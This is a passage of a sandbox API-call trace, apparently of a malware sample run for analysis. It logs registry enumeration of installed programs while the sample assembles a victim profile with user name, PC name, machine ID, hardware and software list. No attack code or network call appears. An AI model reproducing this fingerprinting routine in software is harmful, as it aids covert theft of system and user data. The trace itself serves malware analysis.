lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.098] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.098] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0xa, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPlayer2", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.098] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\MPlayer2") returned 64 [0208.098] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\MPlayer2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.098] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.098] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.099] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0xb, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.099] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\SchedulingAgent") returned 71 [0208.099] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.099] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.099] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.099] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0xc, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.099] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\WIC") returned 59 [0208.099] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.099] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0xe0, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.099] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.099] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0xd, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.099] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}") returned 94 [0208.099] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.100] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpcbData=0x19ce18*=0x3f) returned 0x0 [0208.100] lstrlenA (lpString="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508") returned 62 [0208.100] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n", lpString2="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508" [0208.100] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="14.25.28508", lpcbData=0x19ce18*=0xc) returned 0x0 [0208.100] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 " [0208.100] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 ", lpString2="14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508" [0208.100] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n" [0208.100] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.100] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0xe, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.100] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}") returned 94 [0208.100] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.100] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpcbData=0x19ce18*=0x3b) returned 0x0 [0208.101] lstrlenA (lpString="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005") returned 58 [0208.101] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\n", lpString2="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005" [0208.101] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="12.0.21005", lpcbData=0x19ce18*=0xb) returned 0x0 [0208.101] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 " [0208.101] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 ", lpString2="12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005" [0208.101] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 